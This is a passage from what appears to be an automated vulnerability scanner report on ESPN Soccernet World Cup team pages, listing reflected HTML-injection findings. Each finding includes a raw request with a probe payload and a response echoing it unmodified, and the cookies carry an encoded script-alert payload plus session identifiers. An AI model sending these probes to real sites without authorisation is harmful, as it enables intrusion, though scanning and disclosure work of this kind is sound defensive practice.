GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT Content-Length: 82086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:02 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT Content-Length: 81397 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available"> ...[SNIP]...
2.58. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/205/brazil
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT Content-Length: 81505 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT Content-Length: 81910 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile"> ...[SNIP]...
2.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/207/chile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:29 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT Content-Length: 82018 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT Content-Length: 82073 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach"> ...[SNIP]...
2.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/210/paraguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT Content-Length: 82181 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT Content-Length: 81983 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place"> ...[SNIP]...
2.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
